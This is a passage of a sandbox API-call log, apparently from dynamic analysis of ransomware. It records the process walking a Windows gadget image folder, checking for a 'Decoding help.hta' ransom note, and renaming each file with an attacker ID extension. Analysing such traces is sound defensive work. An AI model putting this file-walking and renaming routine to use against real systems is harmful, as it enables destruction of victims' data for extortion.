[0059.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.431] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc033411, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc033411, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="12.png", cAlternateFileName="")) returned 1 [0059.431] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.431] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.431] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.431] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.431] lstrcmpiW (lpString1="Decoding help.hta", lpString2="12.png") returned 1 [0059.431] lstrlenW (lpString="12.png") returned 6 [0059.431] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.431] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.431] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="12.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png" [0059.431] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png" [0059.432] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.432] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818acf3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818acf3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="120DPI", cAlternateFileName="")) returned 1 [0059.432] lstrcmpW (lpString1=".", lpString2="120DPI") returned -1 [0059.432] lstrcmpW (lpString1="..", lpString2="120DPI") returned -1 [0059.432] lstrcmpiW (lpString1="windows", lpString2="120DPI") returned 1 [0059.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.432] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.432] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="120DPI" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI" [0059.432] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\*.*" [0059.432] GlobalMemoryStatus (in: lpBuffer=0x2569fd10 | out: lpBuffer=0x2569fd10) [0059.432] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107a80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0059.433] CloseHandle (hObject=0x46c) returned 1 [0059.433] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc033411, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc033411, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="13.png", cAlternateFileName="")) returned 1 [0059.433] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.433] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.433] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.433] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.433] lstrcmpiW (lpString1="Decoding help.hta", lpString2="13.png") returned 1 [0059.433] lstrlenW (lpString="13.png") returned 6 [0059.433] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.433] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.433] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="13.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png" [0059.434] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png" [0059.434] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.434] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\13.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\13.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.434] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc07f6cf, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc07f6cf, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="14.png", cAlternateFileName="")) returned 1 [0059.434] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.434] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.434] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.435] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.435] lstrcmpiW (lpString1="Decoding help.hta", lpString2="14.png") returned 1 [0059.435] lstrlenW (lpString="14.png") returned 6 [0059.435] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.435] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.435] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="14.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png" [0059.435] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png" [0059.435] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\14.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\14.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.436] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81886ddd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81886ddd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="144DPI", cAlternateFileName="")) returned 1 [0059.436] lstrcmpW (lpString1=".", lpString2="144DPI") returned -1 [0059.436] lstrcmpW (lpString1="..", lpString2="144DPI") returned -1 [0059.436] lstrcmpiW (lpString1="windows", lpString2="144DPI") returned 1 [0059.436] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.436] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.436] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="144DPI" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI" [0059.436] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\*.*" [0059.436] GlobalMemoryStatus (in: lpBuffer=0x2569fd10 | out: lpBuffer=0x2569fd10) [0059.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112d4168, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0059.437] CloseHandle (hObject=0x46c) returned 1 [0059.437] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0a582e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0a582e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="15.png", cAlternateFileName="")) returned 1 [0059.437] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.437] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.437] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.437] lstrcmpiW (lpString1="Decoding help.hta", lpString2="15.png") returned 1 [0059.437] lstrlenW (lpString="15.png") returned 6 [0059.437] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.437] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.437] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="15.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png" [0059.437] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png" [0059.437] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\15.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\15.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.438] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0a582e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0a582e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.png", cAlternateFileName="")) returned 1 [0059.438] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.438] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.438] lstrcmpiW (lpString1="Decoding help.hta", lpString2="16.png") returned 1 [0059.438] lstrlenW (lpString="16.png") returned 6 [0059.438] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.438] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="16.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png" [0059.438] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png" [0059.438] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\16.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\16.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.438] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0cb98d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0cb98d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1c0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="17.png", cAlternateFileName="")) returned 1 [0059.438] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.438] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", 